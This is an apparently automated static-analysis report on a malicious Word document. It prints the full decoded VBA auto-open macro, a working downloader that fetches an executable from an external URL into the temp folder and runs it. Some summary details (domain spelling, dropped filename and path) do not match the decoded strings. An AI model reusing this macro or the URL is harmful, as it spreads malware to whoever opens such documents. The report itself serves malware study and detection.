Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 901652283bd26716…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 50.5 KB
Created: 2015-01-19 10:28:00
Authoring application: Microsoft Office Word
First seen: 2015-02-05
MD5: 6001ed1e009de1a5f9021b613da7de60
SHA-1: 5b6fba5e57237e06f1a7f86ffce0965ba7197e37
SHA-256: 901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7
Risk score: 256

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1071.001 Web Protocols
  • T1204.002 Malicious File

The sample is a malicious Office document containing an obfuscated VBA auto-exec loader. The autoopen macro calls a function that decodes a URL and a filename, then uses CreateObject to download a file from 'http://stylishseychlelles.com/js/bin.exe' to the path 'C:\Users\Public\TEMA.exe', using the Environ function to resolve the user's temporary directory. This indicates the document is designed to download and execute a second-stage payload.

Heuristics (8)

  • ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script:
        Sub autoopen()
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Matched line in script:
        sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2920 bytes
SHA-256: 4f3799fcc5649f2aab4fdcead194b625e8fb85be57347856418b72231f771b32

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
Private Const u4UPbupdHqn = "VEVNUA=="
Private Const JGYEERm = "aHR0cDovL3N0eWxpc2hzZXljaGVsbGVzLmNvbS9qcy9iaW4uZXhl"
Private Const WbqiAH = DYAVRU2O7CQK
Private Const aXpVWjFOR = u4UPbupdHqn
Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
Private Const s1tNlT1AWf = ""
Private Const FTKZS = "R0VU"
Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
Private Const LZKV = ""
Private Const JLR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

Sub iwpHOuE6r()
 nJFIm
End Sub
Sub eODC7ApCVQ()
     iwpHOuE6r
End Sub
Sub autoopen()
     iwpHOuE6r
End Sub
Function JyXsorj(ByVal sdfwefwef As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim hUIGGYdfg As Object, i As Long, GYUbjsdf As Long, hjjjjjb() As Byte
     

    Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
    hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
    hUIGGYdfg.Send

hjjjjjb = hUIGGYdfg.responseBody

    GYUbjsdf = FreeFile
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
    Put #GYUbjsdf, , hjjjjjb
    Close #GYUbjsdf

    Set hUIGGYdfg = Nothing

Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
    End Function
Sub nJFIm()
FFewr43 = NsCj(JGYEERm)
     JyXsorj FFewr43, Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)

End Sub
Public Function NsCj(strInput As String) As String

On Error Resume Next
On Local Error Resume Next
Dim arrChars64() As Byte
Dim arrChars64Rev() As Byte
Dim arrInput() As Byte
Dim arrOutput() As Byte
Dim arrChar(4) As Integer
Dim intLen As Long
Dim intDelta As Long
Dim i As Long
Dim j As Long
Const Base64 = JLR
arrChars64() = StrConv(Base64, vbFromUnicode)
ReDim arrChars64Rev(255)
For i = 0 To UBound(arrChars64)
arrChars64Rev(arrChars64(i)) = i
Next i
intLen = Len(strInput)
If intLen = 0 Then Exit Function
intDelta = intLen Mod 4
If intDelta > 0 Then
strInput = strInput + String$(4 - intDelta, 0)
intLen = Len(strInput)
End If
arrInput() = StrConv(strInput, vbFromUnicode)
ReDim arrOutput(((intLen + 1) / 4) * 3)
For i = 0 To UBound(arrInput) Step 4
arrChar(1) = arrChars64Rev(arrInput(i))
arrChar(2) = arrChars64Rev(arrInput(i + 1))
arrChar(3) = arrChars64Rev(arrInput(i + 2))
arrChar(4) = arrChars64Rev(arrInput(i + 3))
arrOutput(j) = ((arrChar(1) * 4 + Int(arrChar(2) / 16)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(2) * 16 + Int(arrChar(3) / 4)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(3) * 64 + arrChar(4)) And 255)
j = j + 1
Next
 NsCj = Replace(StrConv(arrOutput, vbUnicode), vbNullChar, "")
End Function